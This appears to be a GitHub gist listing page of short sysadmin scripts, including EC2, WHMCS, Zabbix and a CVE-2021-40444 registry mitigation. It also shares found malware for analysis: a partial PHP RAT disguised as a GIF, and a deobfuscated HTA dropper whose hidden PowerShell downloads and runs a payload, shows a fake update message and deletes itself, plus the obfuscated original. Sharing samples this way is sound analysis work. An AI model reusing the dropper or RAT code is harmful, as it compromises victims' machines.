Skip to content

Instantly share code, notes, and snippets.

@jwieder
jwieder / get-my-ec2-hostname.bash
Created September 25, 2021 15:25
This is a very hacky bash script to help get a the publicly assigned hostname of an ec2 instance.
#!/bin/bash
### this is a very hacky bash script to help get a the publicly assigned hostname of an ec2 instance.
### it will only work with instances within us-east-1 because we arent checking region, amazonaws suffix, etc.
# Get my public IP
publicIP=$(curl -s whatismyip.akamai.com)
# Make up AWS EC2 host name with public DNS
publicName=ec2-${publicIP//./-}.us-east-1.compute.amazonaws.com
version: '3.7'
services:
web:
image: django:latest
command: gunicorn hello_django.wsgi:application --bind 0.0.0.0:8000
volumes:
- static_volume:/home/app/web/staticfiles
- media_volume:/home/app/web/mediafiles
ports:
@jwieder
jwieder / CVE-2021-40444_mitigation.reg
Created September 13, 2021 15:33
BACKUP YOUR REGISTRY FIRST. This gist mitigates CVE-2021-40444 using a registry key that automates steps from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet SettingsZones0]
1001=dword00000003
1004=dword00000003
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet SettingsZones1]
1001=dword00000003
1004=dword00000003
@jwieder
jwieder / creditBalanceSidebar.php
Last active July 4, 2021 08:32
Place this hook script in the includes/hooks/ directory of the WHMCS folder within your server's webroot to display each client's available credit balance as a sidebar item within the WHMCS Client Area homepage and billing-related pages. Created by combining elements from two scripts from the WHMCS forums and fixing several issues with both. Tes…
<?php
/**
* Display Client's Credit Balance as a Sidebar Item in Client Area Homepage and Billing-related Pages
*
* @author Josh Wieder
* @link https://gist.github.com/jwieder/3d470a4e85e041ca41bc2cee0c5aa7a8#file-creditbalancesidebar-php
* @since WHMCS v6.0.0+
*/
@jwieder
jwieder / fpingperm.sh
Created April 29, 2017 17:12
A simple shell script that will restore the permissions to fping & fping6 required by Zabbix following an update or other system change. I use this as part of a daily cron. NOTE: this is designed for RHEL/CentOS, and assumes that you are running Zabbix from a group named "zabbix".
#!/bin/bash
x=0
y=0
if [ -e /usr/sbin/fping ]
then
if [ `stat -c %a:%G /usr/sbin/fping` == "6710:zabbix" ]
then
echo "Sticky bit assigned and owner set"
@jwieder
jwieder / gif-embedded-RAT-v1425.php
Created April 15, 2017 14:14
This is the source code for a RAT I found. The RAT was rot-13 encoded, and contained a standard six byte .GIF header. The idea being to upload the file as an attachment for a form or other program that allows such foolishness. I found the revision number interesting.
/*
* REVISION: $Rev: 1426 $
*/
if (md5(md5($_REQUEST['hhh'])) == 'bc5aaff98e1783e8e30f266af63cea42') {
set_time_limit(36000);
function unslash_rec(&$arr)
{
reset($arr);
while (list($key) = each($arr))
@jwieder
jwieder / stateNameCoversion.php
Created September 19, 2016 17:23
PHP script to convert a text file of two letter state abbreviations into full text names. You can replace the $us_state_abbrev array with just about any one-dimensional array to convert whatever you want (countries, etc). You can also easily change this so that full state names are converted to two-state codes.
<?php
/*
* Replace list.txt with the name of your file. The file should only include a list of two-letter state abbreviations, one on each line.
* Results printed to STDIO, so use pipes to dump to a file if you want to save the results or add a function to do the same thing (I was
* using this for CLI use which is why a function isnt in here already)
*
* Josh Wieder
* https://consulting.joshwieder.net
*/
@jwieder
jwieder / chrome_patch-DEobfuscated.hta
Last active July 30, 2016 16:02
DEobfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
try {
moveTo(-100, -100);
resizeTo(0, 0);
a = new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'g2924808f66985de3a9ad1e3d743e0d.exe';(New-Object System.Net.WebClient).DownloadFile(' https://website.ext/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);", 0, false);
var b = new ActiveXObject('Scripting.FileSystemObject');
var p = document.location.href;
p = unescape(p.substr(8));
if (b.FileExists(p)) b.DeleteFile(p);
} catch (e) {}
@jwieder
jwieder / chrome_patch-obfuscated.hta
Created July 30, 2016 15:42
obfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
<script>var jjxqu='tqrfyb u{d gmoogvdexTiot(q-b1d0i0o,v-s1m0g0w)l;srceksuiezwetTbom(y0c,h0b)j;w ian=tnqehwj rAkcstgifvlesXmOhbejfekcotz(o\'kWssqcxrritpets.dSbhaeqlulr\'x)e;i iaw.pRouhni(b"pPmogwaebrfSphleylflj p-zWoihnddpoiwtSjtzyrlnei zHkiydodsehnp i$tdv=i$veanxvh:ytdeqmnpd+f\'v\g\u4eaa2e9e2r4s8n0r8';var qwis='dfl6f6v9s8v5edmeq3mah9qakdo1pen3fdd7r4k3zex0fde.xejxiep\'c;v(hNfehwm-bOabijfencytr vSpycsktfepmp.iNheati.eWfembbCplvirernrty)x.zDloywzntldomardvFhihlxer(m\'n hhvtuthpdsy:n/q/acchliseuwdgqarmcobnpicavcs.ponrogx/u1l7p/g5z2w4c.tdeafts\'r,w$tdt)i;lSotlabrfto-dPurqoycnegslsb d$gdn;s[nSm';var ywjtfy='ypsptfetmv.xRkerfqleezcctsilodnx.aAhsssrefmfbxlryh]a:x:uLsokagdhWaimtbhvPjamrmtaiqamldNjaymgeh(y\'oSayqsttfenml.nWnijnhdgotwnso.tFzoqrpmjsc\'b)k;s[osnycsntuekml.iwkibncdpopwnsc.dfxokrjmqsy.ymkeysoszahgqebbsojxq]g:m:dsbhwopwk(g\'rUmpwdgaatzej ycjotmopilseztgeh.z\'o,x\'bIhnhfronrtmvapt';var mzqyqx='qikoznx\'c,m[tWjinntdsolwdsm.aFloframrsm.aMfejsbsmargteaBlooxpBbuztptyobncss]k:p:lOdKb,o q[cSayvsctrehmc.xWrienkdioxw